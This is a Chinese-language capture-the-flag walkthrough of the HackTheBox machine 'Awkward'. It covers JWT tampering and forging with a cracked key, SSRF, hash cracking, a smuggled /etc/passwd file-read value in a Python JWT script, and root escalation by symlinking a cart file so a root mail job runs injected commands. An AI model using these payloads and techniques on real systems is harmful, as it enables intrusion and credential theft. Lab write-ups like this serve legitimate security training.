HackTheBox - Medium - Linux - Awkward

Awkward

Awkward 是一款中等难度的机器，它突出显示了不会导致 RCE 的代码注入漏洞，而是 SSRF、LFI 和任意文件写入/追加漏洞。此外，该框还涉及通过不良的密码做法（例如密码重用）以及以纯文本形式存储密码来绕过身份验证。

---

外部信息收集

端口扫描

循例nmap

Web枚举

Vhost枚举

ffuf

从主站的开发者工具中能找到router.js，里面有几个路由

/hr

http请求里有个token，常规把guest改admin，然后刷新页面

跳转到了dashboard

现在我们继续看services下的/api端点

通过staff-details，我们能够获得user和密码hash

hashcat爆出一个，是christopher.jones的

把token重置为guest，然后到/hr登录

SSRF

store-status参数是一个url，盲猜SSRF, 直接给一个url发现没成功

通过常规@符逃逸就成功了

前面的store子域是需要登录的，密码重用没成功

通过SSRF扫内网的http服务

生成数字字典

ffuf

3002披露了那几个api的后端源码

Foothold

值得注意的是all-leave，这里user虽然被黑名单严格检测，但依然有可乘之机, 这将通过jwt来让它妥协

这里的jwt是签名的，通过jhon爆破得到密钥

生成jwt poc

import jwt


key = "123beany123"
algorithm = "HS256"
payload = {"username": "/' /etc/passwd '"}

token = jwt.encode(payload, key, algorithm=algorithm)
print(token)

两个用户，读/home/bean/.bashrc

读backup_home.sh

#!/bin/bash
mkdir /home/bean/Documents/backup_tmp
cd /home/bean
tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz .
date > /home/bean/Documents/backup_tmp/time.txt
cd /home/bean/Documents/backup_tmp
tar -czvf /home/bean/Documents/backup/bean_backup_final.tar.gz .
rm -r /home/bean/Documents/backup_tmp

从浏览器下.tar.gz，解压之后得到

在xpad中能看到bean的明文凭据

通过这个明文密码，我们可以登bean的ssh

本地权限提升

现在，我们能够通过admin:bean的凭据 登录store子域

同时，pspy也发现了root似乎在读leave_requests.csv后发送了一封邮件，我看到bean.hill时我想应该可以修改leave_requests.csv将username改为恶意命令来达到劫持这条命令的效果

2024/01/05 23:40:01 CMD: UID=0     PID=4834   | tail -1 /var/www/private/leave_requests.csv 
2024/01/05 23:40:01 CMD: UID=0     PID=4836   | /bin/bash /root/scripts/notify.sh 
2024/01/05 23:40:01 CMD: UID=0     PID=4841   | trivial-rewrite -n rewrite -t unix -u -c 
2024/01/05 23:40:01 CMD: UID=0     PID=4840   | mail -s Leave Request: bean.hill christine

然鹅/var/www/private/leave_requests.csv无权读写

在store查看时，我发现了一些txt，并且去读取了它们，这些似乎是一些http参数

grep

在cart_actions.php中，值得关注的是这些代码

//check for valid hat valley store item
function checkValidItem($filename) {
    if(file_exists($filename)) {
        $first_line = file($filename)[0];
        if(strpos($first_line, "***Hat Valley") !== FALSE) {
            return true;
...
//add to cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'add_item' && $_POST['item'] && $_POST['user']) {
    $item_id = $_POST['item'];
    $user_id = $_POST['user'];
    $bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!

    foreach($bad_chars as $bad) {
        if(strpos($item_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    foreach($bad_chars as $bad) {
        if(strpos($user_id, $bad) !== FALSE) {
            echo "Bad character detected!";
            exit;
        }
    }

    if(checkValidItem("{$STORE_HOME}product-details/{$item_id}.txt")) {
        if(!file_exists("{$STORE_HOME}cart/{$user_id}")) {
            system("echo '***Hat Valley Cart***' > {$STORE_HOME}cart/{$user_id}");
        }
        system("head -2 {$STORE_HOME}product-details/{$item_id}.txt | tail -1 >> {$STORE_HOME}cart/{$user_id}");
        echo "Item added successfully!";
    }

虽然我们依然无法直接rce，但是product-details/和cart/两个目录我们都有777权限，private/ www-data组应该有权限

在product-details/下创建一个新的4.txt，在第二行写入恶意命令

去到cart/创建软连接

创建cmd.sh

请求cart_actions.php

不出意外它会到来，除非手慢了